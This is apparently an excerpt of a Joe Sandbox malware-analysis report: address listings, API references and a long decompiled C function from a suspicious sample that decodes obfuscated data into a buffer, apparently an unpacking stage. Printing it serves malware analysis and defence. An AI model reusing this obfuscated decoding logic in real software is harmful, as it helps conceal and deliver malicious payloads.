                                                                                                                                                                                                                                                                      0x01183942
                                                                                                                                                                                                                                                                      0x0118394e
                                                                                                                                                                                                                                                                      0x01183957
                                                                                                                                                                                                                                                                      0x01183963
                                                                                                                                                                                                                                                                      0x01183963
                                                                                                                                                                                                                                                                      0x01183b7c
                                                                                                                                                                                                                                                                      0x01183b98
                                                                                                                                                                                                                                                                      0x01183ba4
                                                                                                                                                                                                                                                                      0x01183baf
                                                                                                                                                                                                                                                                      0x01183bb9
                                                                                                                                                                                                                                                                      0x01183bc9
                                                                                                                                                                                                                                                                      0x01183bcf
                                                                                                                                                                                                                                                                      0x01183bd6
                                                                                                                                                                                                                                                                      0x01183bdc
                                                                                                                                                                                                                                                                      0x01183bf1
                                                                                                                                                                                                                                                                      0x01183bfa
                                                                                                                                                                                                                                                                      0x01183c03
                                                                                                                                                                                                                                                                      0x01183c03
                                                                                                                                                                                                                                                                      0x01183c15

                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • CreateMutexA.KERNEL32(?,?,?), ref: 01183A76
                                                                                                                                                                                                                                                                      • GetModuleHandleA.KERNEL32(?), ref: 01183A8C
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.815380758.0000000001181000.00000020.00000001.01000000.00000003.sdmp, Offset: 01180000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.815317551.0000000001180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.815648726.0000000001199000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.816245564.00000000011DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.817184209.000000000121D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.817258824.000000000121F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_1180000_PIyT9A3jfC.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: CreateHandleModuleMutex
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 3857879770-0
                                                                                                                                                                                                                                                                      • Opcode ID: a00f38f9b69073a06dfb5a1ff7fdbf6fbb9159896ebe610271da46ba472ef8b8
                                                                                                                                                                                                                                                                      • Instruction ID: fd5cb02dc3646529aa94d6d9d211c80401a7eaf993bcfe4a6057de2b239c827e
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a00f38f9b69073a06dfb5a1ff7fdbf6fbb9159896ebe610271da46ba472ef8b8
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A502C5B1600148CFEB18CFA8D594A9E7BE6FF88304F548229EA199B795D735E841CF84
                                                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                      C-Code - Quality: 99%
                                                                                                                                                                                                                                                                      			E011955C0(intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16, signed int _a20, intOrPtr _a24, signed int _a28) {
                                                                                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                                                                                      				unsigned int _v12;
                                                                                                                                                                                                                                                                      				unsigned int _v16;
                                                                                                                                                                                                                                                                      				signed int _v20;
                                                                                                                                                                                                                                                                      				signed int _v24;
                                                                                                                                                                                                                                                                      				signed int _v28;
                                                                                                                                                                                                                                                                      				signed int _v32;
                                                                                                                                                                                                                                                                      				signed int _v36;
                                                                                                                                                                                                                                                                      				signed int _v40;
                                                                                                                                                                                                                                                                      				signed int _v44;
                                                                                                                                                                                                                                                                      				signed int _v48;
                                                                                                                                                                                                                                                                      				signed int _v52;
                                                                                                                                                                                                                                                                      				signed int _v56;
                                                                                                                                                                                                                                                                      				signed int _v60;
                                                                                                                                                                                                                                                                      				intOrPtr _v64;
                                                                                                                                                                                                                                                                      				intOrPtr _v68;
                                                                                                                                                                                                                                                                      				intOrPtr _v72;
                                                                                                                                                                                                                                                                      				intOrPtr _v76;
                                                                                                                                                                                                                                                                      				intOrPtr _v80;
                                                                                                                                                                                                                                                                      				intOrPtr _v84;
                                                                                                                                                                                                                                                                      				struct _OVERLAPPED* _v88;
                                                                                                                                                                                                                                                                      				DWORD* _v92;
                                                                                                                                                                                                                                                                      				long _v96;
                                                                                                                                                                                                                                                                      				void* _v100;
                                                                                                                                                                                                                                                                      				void* _v104;
                                                                                                                                                                                                                                                                      				intOrPtr _t353;
                                                                                                                                                                                                                                                                      				signed int _t355;
                                                                                                                                                                                                                                                                      				signed int _t378;
                                                                                                                                                                                                                                                                      				intOrPtr _t387;
                                                                                                                                                                                                                                                                      				intOrPtr _t391;
                                                                                                                                                                                                                                                                      				intOrPtr _t392;
                                                                                                                                                                                                                                                                      				intOrPtr _t394;
                                                                                                                                                                                                                                                                      				signed int _t395;
                                                                                                                                                                                                                                                                      				intOrPtr _t396;
                                                                                                                                                                                                                                                                      				intOrPtr _t407;
                                                                                                                                                                                                                                                                      				signed int _t412;
                                                                                                                                                                                                                                                                      				signed int _t413;
                                                                                                                                                                                                                                                                      				intOrPtr _t429;
                                                                                                                                                                                                                                                                      				intOrPtr _t441;
                                                                                                                                                                                                                                                                      				intOrPtr _t443;
                                                                                                                                                                                                                                                                      				signed int _t457;
                                                                                                                                                                                                                                                                      				intOrPtr _t469;
                                                                                                                                                                                                                                                                      				intOrPtr _t478;
                                                                                                                                                                                                                                                                      				intOrPtr _t479;
                                                                                                                                                                                                                                                                      				intOrPtr _t482;
                                                                                                                                                                                                                                                                      				intOrPtr _t504;
                                                                                                                                                                                                                                                                      				intOrPtr _t508;
                                                                                                                                                                                                                                                                      				intOrPtr _t509;
                                                                                                                                                                                                                                                                      				signed int _t528;
                                                                                                                                                                                                                                                                      				intOrPtr _t531;
                                                                                                                                                                                                                                                                      				intOrPtr _t532;
                                                                                                                                                                                                                                                                      				intOrPtr _t537;
                                                                                                                                                                                                                                                                      				intOrPtr _t544;
                                                                                                                                                                                                                                                                      				intOrPtr _t558;
                                                                                                                                                                                                                                                                      				intOrPtr _t561;
                                                                                                                                                                                                                                                                      				intOrPtr _t574;
                                                                                                                                                                                                                                                                      				intOrPtr _t581;
                                                                                                                                                                                                                                                                      				intOrPtr _t584;
                                                                                                                                                                                                                                                                      				intOrPtr _t596;
                                                                                                                                                                                                                                                                      				intOrPtr _t604;
                                                                                                                                                                                                                                                                      				intOrPtr _t606;
                                                                                                                                                                                                                                                                      				intOrPtr _t609;
                                                                                                                                                                                                                                                                      				intOrPtr _t611;
                                                                                                                                                                                                                                                                      				intOrPtr _t614;
                                                                                                                                                                                                                                                                      				intOrPtr _t622;
                                                                                                                                                                                                                                                                      				intOrPtr _t638;
                                                                                                                                                                                                                                                                      				signed int _t640;
                                                                                                                                                                                                                                                                      				intOrPtr _t642;
                                                                                                                                                                                                                                                                      				intOrPtr _t646;
                                                                                                                                                                                                                                                                      				intOrPtr _t647;
                                                                                                                                                                                                                                                                      				intOrPtr _t655;
                                                                                                                                                                                                                                                                      				intOrPtr _t683;
                                                                                                                                                                                                                                                                      				intOrPtr _t693;
                                                                                                                                                                                                                                                                      				intOrPtr _t695;
                                                                                                                                                                                                                                                                      				intOrPtr _t707;
                                                                                                                                                                                                                                                                      				intOrPtr _t716;
                                                                                                                                                                                                                                                                      				intOrPtr _t719;
                                                                                                                                                                                                                                                                      				intOrPtr _t721;
                                                                                                                                                                                                                                                                      				intOrPtr _t739;
                                                                                                                                                                                                                                                                      				intOrPtr _t740;
                                                                                                                                                                                                                                                                      				intOrPtr _t757;
                                                                                                                                                                                                                                                                      				intOrPtr _t764;
                                                                                                                                                                                                                                                                      				intOrPtr _t769;
                                                                                                                                                                                                                                                                      				intOrPtr _t770;
                                                                                                                                                                                                                                                                      				intOrPtr _t772;
                                                                                                                                                                                                                                                                      				intOrPtr _t774;
                                                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                                                      				_v8 = _a16 - 0x122;
                                                                                                                                                                                                                                                                      				_v32 = _a8 + 0xbd;
                                                                                                                                                                                                                                                                      				_v44 = _a20 ^ 0x000003bc;
                                                                                                                                                                                                                                                                      				_v40 = _a28 ^ 0x00000142;
                                                                                                                                                                                                                                                                      				_v52 = _a8 ^ 0x00002628;
                                                                                                                                                                                                                                                                      				_v20 = _a12 ^ 0x00000221;
                                                                                                                                                                                                                                                                      				_v48 = _a20;
                                                                                                                                                                                                                                                                      				_v56 = _a24 - 0xc3;
                                                                                                                                                                                                                                                                      				if(_v40 == _v32 + 0x11c) {
                                                                                                                                                                                                                                                                      					_v36 = _v8;
                                                                                                                                                                                                                                                                      					while(1) {
                                                                                                                                                                                                                                                                      						_t353 = _a4;
                                                                                                                                                                                                                                                                      						_t504 = _a4;
                                                                                                                                                                                                                                                                      						__eflags = _v36 - ( *(_t353 + 0x3c) &  *(_t504 + 0xb4) ^ 0x000024c7);
                                                                                                                                                                                                                                                                      						if(_v36 <= ( *(_t353 + 0x3c) &  *(_t504 + 0xb4) ^ 0x000024c7)) {
                                                                                                                                                                                                                                                                      							goto L25;
                                                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                                                      						_t638 =  *0x121d5ec; // 0x121d5f0
                                                                                                                                                                                                                                                                      						__eflags =  *((intOrPtr*)(_t638 + 0xbadca9)) - _v20 + 0x253b;
                                                                                                                                                                                                                                                                      						if( *((intOrPtr*)(_t638 + 0xbadca9)) == _v20 + 0x253b) {
                                                                                                                                                                                                                                                                      							_v8 = (_v8 - _v20 - 0x2628) * _v8;
                                                                                                                                                                                                                                                                      							_t508 =  *0x121d5ec; // 0x121d5f0
                                                                                                                                                                                                                                                                      							_t289 = _t508 + 0xac; // 0x1a0e74
                                                                                                                                                                                                                                                                      							_t642 =  *0x121d5ec; // 0x121d5f0
                                                                                                                                                                                                                                                                      							_t290 = _t642 + 0xac; // 0x1a0e74
                                                                                                                                                                                                                                                                      							_t509 =  *0x121d5ec; // 0x121d5f0
                                                                                                                                                                                                                                                                      							 *(_t509 + 0xac) = ( *0x0121D6A8 | 0x00002801) +  *_t289 |  *_t290;
                                                                                                                                                                                                                                                                      							_v56 = _v20 * _v20 * _v44;
                                                                                                                                                                                                                                                                      							_t646 =  *0x121d5ec; // 0x121d5f0
                                                                                                                                                                                                                                                                      							_t647 =  *0x121d5ec; // 0x121d5f0
                                                                                                                                                                                                                                                                      							 *(_t647 + 0xbadbdd) = (_v40 | 0x00002633) *  *(_t646 + 0xbadbdd);
                                                                                                                                                                                                                                                                      							 *(_a4 + 0x14) =  *(_a4 + 0x14) -  *((intOrPtr*)(_a4 + 0xbadc51)) -  *((intOrPtr*)(_a4 + 0xec));
                                                                                                                                                                                                                                                                      							_v104 =  *(_a4 + 0x68) * _v44 +  *((intOrPtr*)(_a4 + 0xdc));
                                                                                                                                                                                                                                                                      							_t655 =  *0x121d5ec; // 0x121d5f0
                                                                                                                                                                                                                                                                      							_t378 =  *0x121d68c; // 0x14b95e
                                                                                                                                                                                                                                                                      							_t319 = _t655 + 0xe4; // 0xc
                                                                                                                                                                                                                                                                      							_v100 = (_t378 ^  *_t319) *  *(_a4 + 0xb4);
                                                                                                                                                                                                                                                                      							_v96 = _v40 &  *(_a4 + 0xbadc29);
                                                                                                                                                                                                                                                                      							_v92 =  *(_a4 + 0xbadbdd) |  *0x121d69c;
                                                                                                                                                                                                                                                                      							_v88 = _v44 &  *(_a4 + 0xe0);
                                                                                                                                                                                                                                                                      							ReadFile(_v104, _v100, _v96, _v92, _v88);
                                                                                                                                                                                                                                                                      							_t387 =  *0x121d5ec; // 0x121d5f0
                                                                                                                                                                                                                                                                      							_t342 = _t387 + 0x78; // 0x79aca
                                                                                                                                                                                                                                                                      							_t528 = (_v52 -  *_t342 | 0x00002598) ^  *(_a4 + 0xac);
                                                                                                                                                                                                                                                                      							__eflags = _t528;
                                                                                                                                                                                                                                                                      							 *(_a4 + 0xac) = _t528;
                                                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                                                      						_t640 = _v36 + 1;
                                                                                                                                                                                                                                                                      						__eflags = _t640;
                                                                                                                                                                                                                                                                      						_v36 = _t640;
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                                                                                      					_t391 =  *0x121d5ec; // 0x121d5f0
                                                                                                                                                                                                                                                                      					 *((intOrPtr*)(_t391 + 0xf0)) = ( *(_a4 + 0x38) ^  *0x01DCB1CD) + 0x273c;
                                                                                                                                                                                                                                                                      					_t392 =  *0x121d5ec; // 0x121d5f0
                                                                                                                                                                                                                                                                      					_t531 =  *0x121d5ec; // 0x121d5f0
                                                                                                                                                                                                                                                                      					_t23 = _t392 + 0xec; // 0xe608d
                                                                                                                                                                                                                                                                      					if( *_t23 !=  *((intOrPtr*)(_t531 + 0x14))) {
                                                                                                                                                                                                                                                                      						_t394 =  *0x121d6dc; // 0xe608d
                                                                                                                                                                                                                                                                      						_t395 = _t394 - 0x442f5;
                                                                                                                                                                                                                                                                      						__eflags = _t395;
                                                                                                                                                                                                                                                                      						_t532 =  *0x121d5ec; // 0x121d5f0
                                                                                                                                                                                                                                                                      						 *(_t532 + 0x58) = _t395;
                                                                                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                                                                                      						_t774 =  *0x121d5ec; // 0x121d5f0
                                                                                                                                                                                                                                                                      						 *(_a4 + 0x74) =  *(_a4 + 0xb4) -  *((intOrPtr*)(_a4 + 0xfc)) -  *((intOrPtr*)(_t774 + 0xbadbfd)) |  *(_a4 + 0x74);
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      					_t396 =  *0x121d5ec; // 0x121d5f0
                                                                                                                                                                                                                                                                      					_t42 = _t396 + 0xb4; // 0x0
                                                                                                                                                                                                                                                                      					if( *((intOrPtr*)(_a4 + 0xb0)) ==  *_t42) {
                                                                                                                                                                                                                                                                      						_t764 =  *0x121d5ec; // 0x121d5f0
                                                                                                                                                                                                                                                                      						_t43 = _t764 + 0x58; // 0xc4ec4ec5
                                                                                                                                                                                                                                                                      						_t622 =  *0x121d5ec; // 0x121d5f0
                                                                                                                                                                                                                                                                      						 *(_t622 + 0x58) =  *_t43 ^ 0x1a154549;
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      					 *0x121d678 = 0x11a30b0;
                                                                                                                                                                                                                                                                      					_v24 = 0;
                                                                                                                                                                                                                                                                      					while(_v24 < 0xb09c) {
                                                                                                                                                                                                                                                                      						 *((intOrPtr*)(_a4 + 0x9c)) =  *((intOrPtr*)(_a4 + 0x9c)) -  *((intOrPtr*)(_a4 + 0xa4));
                                                                                                                                                                                                                                                                      						_t596 =  *0x121d5ec; // 0x121d5f0
                                                                                                                                                                                                                                                                      						_t61 = _t596 + 0xe4; // 0xc
                                                                                                                                                                                                                                                                      						_t739 =  *0x121d5ec; // 0x121d5f0
                                                                                                                                                                                                                                                                      						 *((intOrPtr*)(_t739 + 0xe4)) = ( *((intOrPtr*)(_a4 + 0xdc)) +  *(_a4 + 0xbadbdd) ^ 0x00000009) +  *_t61;
                                                                                                                                                                                                                                                                      						_t740 =  *0x121d5ec; // 0x121d5f0
                                                                                                                                                                                                                                                                      						_t63 = _t740 + 0x3c; // 0x161485
                                                                                                                                                                                                                                                                      						 *((intOrPtr*)(_a4 + 0xa4)) =  *((intOrPtr*)(_a4 + 0xa4)) -  *_t63 - 0x161485;
                                                                                                                                                                                                                                                                      						_t469 =  *0x121d5ec; // 0x121d5f0
                                                                                                                                                                                                                                                                      						_t70 = _t469 + 0x88; // 0x119c430
                                                                                                                                                                                                                                                                      						_v16 =  *((intOrPtr*)( *_t70 + _v24 * 4));
                                                                                                                                                                                                                                                                      						 *(_a4 + 0x14) =  *(_a4 + 0x14) |  *(_a4 + 0x8c);
                                                                                                                                                                                                                                                                      						_t604 =  *0x121d5ec; // 0x121d5f0
                                                                                                                                                                                                                                                                      						_t84 = _t604 + 0x58; // 0xc4ec4ec5
                                                                                                                                                                                                                                                                      						_v16 = _v16 *  *_t84;
                                                                                                                                                                                                                                                                      						_t606 =  *0x121d680; // 0x1452000
                                                                                                                                                                                                                                                                      						 *((char*)(_t606 +  *((intOrPtr*)(_a4 + 0x5c)))) = _v16 >> 0x10;
                                                                                                                                                                                                                                                                      						 *((intOrPtr*)(_a4 + 0x5c)) =  *((intOrPtr*)(_a4 + 0x5c)) + 1;
                                                                                                                                                                                                                                                                      						_t478 =  *0x121d5ec; // 0x121d5f0
                                                                                                                                                                                                                                                                      						_t95 = _t478 + 0x90; // 0x1452000
                                                                                                                                                                                                                                                                      						_t479 =  *0x121d64c; // 0x4b420
                                                                                                                                                                                                                                                                      						 *((char*)( *_t95 + _t479)) = _v16 >> 8;
                                                                                                                                                                                                                                                                      						_t609 =  *0x121d64c; // 0x4b420
                                                                                                                                                                                                                                                                      						 *0x121d64c = _t609 + 1;
                                                                                                                                                                                                                                                                      						_t611 =  *0x121d680; // 0x1452000
                                                                                                                                                                                                                                                                      						 *((char*)(_t611 +  *((intOrPtr*)(_a4 + 0x5c)))) = _v16;
                                                                                                                                                                                                                                                                      						 *((intOrPtr*)(_a4 + 0x5c)) =  *((intOrPtr*)(_a4 + 0x5c)) + 1;
                                                                                                                                                                                                                                                                      						_t482 =  *0x121d62c; // 0x161485
                                                                                                                                                                                                                                                                      						_t614 =  *0x121d5ec; // 0x121d5f0
                                                                                                                                                                                                                                                                      						_t105 = _t614 + 0xac; // 0x1a0e74
                                                                                                                                                                                                                                                                      						_t757 =  *0x121d5ec; // 0x121d5f0
                                                                                                                                                                                                                                                                      						 *(_t757 + 0xac) = _t482 - 0x00161485 ^  *_t105;
                                                                                                                                                                                                                                                                      						_t772 =  *0x121d5ec; // 0x121d5f0
                                                                                                                                                                                                                                                                      						 *((intOrPtr*)(_a4 + 0xbadc81)) =  *((intOrPtr*)(_a4 + 0xbadc81)) -  *((intOrPtr*)(_a4 + 0xb8)) +  *((intOrPtr*)(_t772 + 0x40)) - 0x18e299;
                                                                                                                                                                                                                                                                      						_v24 = _v24 + 1;
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      					 *(_a4 + 0x58) =  *0x0121D694 - 0x49249249;
                                                                                                                                                                                                                                                                      					_v84 = _v20 + 0x48;
                                                                                                                                                                                                                                                                      					_v80 = _v48 + 0xf8;
                                                                                                                                                                                                                                                                      					_v76 = _v32 - 0x1aa;
                                                                                                                                                                                                                                                                      					_t537 =  *0x121d5ec; // 0x121d5f0
                                                                                                                                                                                                                                                                      					_v72 = _t537;
                                                                                                                                                                                                                                                                      					_v68 = _v8 + 0x16e;
                                                                                                                                                                                                                                                                      					_v64 = _v52 + 0x25a0;
                                                                                                                                                                                                                                                                      					_v60 = _v32 ^ 0x00000091;
                                                                                                                                                                                                                                                                      					_push(_v60);
                                                                                                                                                                                                                                                                      					_v48 = L011816C0(_v84, _v80, _v76, _v72, _v68, _v64);
                                                                                                                                                                                                                                                                      					_t407 = _a4;
                                                                                                                                                                                                                                                                      					_t769 =  *0x121d5ec; // 0x121d5f0
                                                                                                                                                                                                                                                                      					__eflags =  *((intOrPtr*)(_t407 + 0xb8)) -  *((intOrPtr*)(_t769 + 0xbadbfd));
                                                                                                                                                                                                                                                                      					if( *((intOrPtr*)(_t407 + 0xb8)) >=  *((intOrPtr*)(_t769 + 0xbadbfd))) {
                                                                                                                                                                                                                                                                      						 *((intOrPtr*)(_a4 + 0x88)) = 0x1199380;
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      					_v28 = 0;
                                                                                                                                                                                                                                                                      					while(1) {
                                                                                                                                                                                                                                                                      						__eflags = _v28 - 0xc0c;
                                                                                                                                                                                                                                                                      						if(_v28 >= 0xc0c) {
                                                                                                                                                                                                                                                                      							break;
                                                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                                                      						 *(_a4 + 0x14) =  *(_a4 + 0xe0) ^ 0xfffe3a5b |  *(_a4 + 0x14);
                                                                                                                                                                                                                                                                      						_v12 =  *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x88)) + _v28 * 4));
                                                                                                                                                                                                                                                                      						_v12 = _v12 *  *(_a4 + 0x58);
                                                                                                                                                                                                                                                                      						_t558 =  *0x121d5ec; // 0x121d5f0
                                                                                                                                                                                                                                                                      						_t176 = _t558 + 0xdc; // 0x8
                                                                                                                                                                                                                                                                      						_t693 =  *0x121d5ec; // 0x121d5f0
                                                                                                                                                                                                                                                                      						 *(_t693 + 0xdc) =  *((intOrPtr*)(_a4 + 0x10)) -  *0x121d6d0 ^ 0x0001c5af |  *_t176;
                                                                                                                                                                                                                                                                      						_t695 =  *0x121d5ec; // 0x121d5f0
                                                                                                                                                                                                                                                                      						_t561 =  *0x121d5ec; // 0x121d5f0
                                                                                                                                                                                                                                                                      						 *(_t561 + 0xa4) =  *((intOrPtr*)(_a4 + 0x78)) - 0x00079aca ^  *(_t695 + 0xa4);
                                                                                                                                                                                                                                                                      						_t429 =  *0x121d5ec; // 0x121d5f0
                                                                                                                                                                                                                                                                      						_t770 =  *0x121d5ec; // 0x121d5f0
                                                                                                                                                                                                                                                                      						 *((intOrPtr*)(_a4 + 0xec)) =  *((intOrPtr*)(_t429 + 0xbadbfd)) -  *((intOrPtr*)(_t770 + 0x14)) +  *((intOrPtr*)(_a4 + 0xec)) - 0x49bb9045;
                                                                                                                                                                                                                                                                      						 *((intOrPtr*)(_a4 + 0xbadc81)) =  *((intOrPtr*)(_a4 + 0xbadc81)) -  *((intOrPtr*)(_a4 + 0x3c)) - 0x161485;
                                                                                                                                                                                                                                                                      						_t707 =  *0x121d5ec; // 0x121d5f0
                                                                                                                                                                                                                                                                      						_t205 = _t707 + 0x90; // 0x1452000
                                                                                                                                                                                                                                                                      						 *((char*)( *_t205 +  *((intOrPtr*)(_a4 + 0x5c)))) = _v12 >> 0x18;
                                                                                                                                                                                                                                                                      						 *((intOrPtr*)(_a4 + 0x5c)) =  *((intOrPtr*)(_a4 + 0x5c)) + 1;
                                                                                                                                                                                                                                                                      						 *0x121d6a4 = ( *0x0121D604 ^ 0xb655b0d2) +  *0x121d6a4;
                                                                                                                                                                                                                                                                      						_t574 =  *0x121d5ec; // 0x121d5f0
                                                                                                                                                                                                                                                                      						_t441 =  *0x121d5ec; // 0x121d5f0
                                                                                                                                                                                                                                                                      						 *((intOrPtr*)(_t441 + 0xbadbdd)) =  *(_a4 + 0xe0) +  *((intOrPtr*)(_t574 + 0xbadbdd)) + 0x1c5a5;
                                                                                                                                                                                                                                                                      						_t716 =  *0x121d5ec; // 0x121d5f0
                                                                                                                                                                                                                                                                      						_t221 = _t716 + 0x5c; // 0x4b420
                                                                                                                                                                                                                                                                      						 *((char*)( *((intOrPtr*)(_a4 + 0x90)) +  *_t221)) = _v12 >> 0x10;
                                                                                                                                                                                                                                                                      						_t443 =  *0x121d5ec; // 0x121d5f0
                                                                                                                                                                                                                                                                      						_t225 = _t443 + 0x5c; // 0x4b420
                                                                                                                                                                                                                                                                      						_t719 =  *0x121d5ec; // 0x121d5f0
                                                                                                                                                                                                                                                                      						 *((intOrPtr*)(_t719 + 0x5c)) =  *_t225 + 1;
                                                                                                                                                                                                                                                                      						_t581 =  *0x121d64c; // 0x4b420
                                                                                                                                                                                                                                                                      						 *((char*)( *((intOrPtr*)(_a4 + 0x90)) + _t581)) = _v12 >> 8;
                                                                                                                                                                                                                                                                      						_t721 =  *0x121d64c; // 0x4b420
                                                                                                                                                                                                                                                                      						 *0x121d64c = _t721 + 1;
                                                                                                                                                                                                                                                                      						_t584 =  *0x121d5ec; // 0x121d5f0
                                                                                                                                                                                                                                                                      						_t234 = _t584 + 0xe0; // 0xfffe3a5b
                                                                                                                                                                                                                                                                      						 *(_a4 + 0xbadbdd) =  *(_a4 + 0xbadbdd) - ( *((intOrPtr*)(_a4 + 0xa4)) +  *_t234 ^ 0xfffe3a5b);
                                                                                                                                                                                                                                                                      						 *((char*)( *((intOrPtr*)(_a4 + 0x90)) +  *((intOrPtr*)(_a4 + 0x5c)))) = _v12;
                                                                                                                                                                                                                                                                      						 *((intOrPtr*)(_a4 + 0x5c)) =  *((intOrPtr*)(_a4 + 0x5c)) + 1;
                                                                                                                                                                                                                                                                      						 *0x0121D66C =  *((intOrPtr*)(0x121d66c)) +  *(_a4 + 0xb4);
                                                                                                                                                                                                                                                                      						_t457 = _v28 + 1;
                                                                                                                                                                                                                                                                      						__eflags = _t457;
                                                                                                                                                                                                                                                                      						_v28 = _t457;
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      					_t544 =  *0x121d6d0; // 0xfffe3a5b
                                                                                                                                                                                                                                                                      					 *(_a4 + 0x58) = _t544 + 0x4b79b;
                                                                                                                                                                                                                                                                      					 *(_a4 + 0x58) =  *(_a4 + 0xac) +  *((intOrPtr*)(_a4 + 0x9c)) - 0x40d65a68 ^  *(_a4 + 0x58);
                                                                                                                                                                                                                                                                      					_t683 =  *0x121d5ec; // 0x121d5f0
                                                                                                                                                                                                                                                                      					_t269 = _t683 + 0xdc; // 0x8
                                                                                                                                                                                                                                                                      					__eflags =  *_t269 -  *0x121d67c; // 0x0
                                                                                                                                                                                                                                                                      					if(__eflags >= 0) {
                                                                                                                                                                                                                                                                      						_t412 =  *0x121d648; // 0xc4ec4ec5
                                                                                                                                                                                                                                                                      						_t413 = _t412 -  *((intOrPtr*)(_a4 + 0xec)) - 0xe44db;
                                                                                                                                                                                                                                                                      						__eflags = _t413;
                                                                                                                                                                                                                                                                      						 *0x121d648 = _t413;
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                                                      				L25:
                                                                                                                                                                                                                                                                      				_t355 = _v56 + 0x3b;
                                                                                                                                                                                                                                                                      				__eflags = _t355;
                                                                                                                                                                                                                                                                      				return _t355;
                                                                                                                                                                                                                                                                      			}

























































































                                                                                                                                                                                                                                                                      0x011955cf
                                                                                                                                                                                                                                                                      0x011955db
                                                                                                                                                                                                                                                                      0x011955e7
                                                                                                                                                                                                                                                                      0x011955f2
                                                                                                                                                                                                                                                                      0x011955fe
                                                                                                                                                                                                                                                                      0x0119560a
                                                                                                                                                                                                                                                                      0x01195610
                                                                                                                                                                                                                                                                      0x0119561c
                                                                                                                                                                                                                                                                      0x0119562b
                                                                                                                                                                                                                                                                      0x01195cbe
                                                                                                                                                                                                                                                                      0x01195ccc
                                                                                                                                                                                                                                                                      0x01195ccc
                                                                                                                                                                                                                                                                      0x01195ccf
                                                                                                                                                                                                                                                                      0x01195ce1
                                                                                                                                                                                                                                                                      0x01195ce4
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x01195cfb
                                                                                                                                                                                                                                                                      0x01195d01
                                                                                                                                                                                                                                                                      0x01195d08
                                                                                                                                                                                                                                                                      0x01195d1d
                                                                                                                                                                                                                                                                      0x01195d33
                                                                                                                                                                                                                                                                      0x01195d39
                                                                                                                                                                                                                                                                      0x01195d3f
                                                                                                                                                                                                                                                                      0x01195d45
                                                                                                                                                                                                                                                                      0x01195d4b
                                                                                                                                                                                                                                                                      0x01195d51
                                                                                                                                                                                                                                                                      0x01195d62
                                                                                                                                                                                                                                                                      0x01195d76
                                                                                                                                                                                                                                                                      0x01195d89
                                                                                                                                                                                                                                                                      0x01195d8f
                                                                                                                                                                                                                                                                      0x01195dca
                                                                                                                                                                                                                                                                      0x01195dea
                                                                                                                                                                                                                                                                      0x01195ded
                                                                                                                                                                                                                                                                      0x01195df3
                                                                                                                                                                                                                                                                      0x01195df8
                                                                                                                                                                                                                                                                      0x01195e08
                                                                                                                                                                                                                                                                      0x01195e1d
                                                                                                                                                                                                                                                                      0x01195e35
                                                                                                                                                                                                                                                                      0x01195e44
                                                                                                                                                                                                                                                                      0x01195e5b
                                                                                                                                                                                                                                                                      0x01195e61
                                                                                                                                                                                                                                                                      0x01195e69
                                                                                                                                                                                                                                                                      0x01195e75
                                                                                                                                                                                                                                                                      0x01195e75
                                                                                                                                                                                                                                                                      0x01195e7e
                                                                                                                                                                                                                                                                      0x01195e7e
                                                                                                                                                                                                                                                                      0x01195cc6
                                                                                                                                                                                                                                                                      0x01195cc6
                                                                                                                                                                                                                                                                      0x01195cc9
                                                                                                                                                                                                                                                                      0x01195cc9
                                                                                                                                                                                                                                                                      0x01195631
                                                                                                                                                                                                                                                                      0x0119564b
                                                                                                                                                                                                                                                                      0x01195650
                                                                                                                                                                                                                                                                      0x0119565e
                                                                                                                                                                                                                                                                      0x01195663
                                                                                                                                                                                                                                                                      0x01195669
                                                                                                                                                                                                                                                                      0x01195673
                                                                                                                                                                                                                                                                      0x011956c2
                                                                                                                                                                                                                                                                      0x011956c7
                                                                                                                                                                                                                                                                      0x011956c7
                                                                                                                                                                                                                                                                      0x011956cc
                                                                                                                                                                                                                                                                      0x011956d2
                                                                                                                                                                                                                                                                      0x01195675
                                                                                                                                                                                                                                                                      0x011956a0
                                                                                                                                                                                                                                                                      0x011956bc
                                                                                                                                                                                                                                                                      0x011956bc
                                                                                                                                                                                                                                                                      0x011956d8
                                                                                                                                                                                                                                                                      0x011956e3
                                                                                                                                                                                                                                                                      0x011956e9
                                                                                                                                                                                                                                                                      0x011956eb
                                                                                                                                                                                                                                                                      0x011956f1
                                                                                                                                                                                                                                                                      0x011956f9
                                                                                                                                                                                                                                                                      0x011956ff
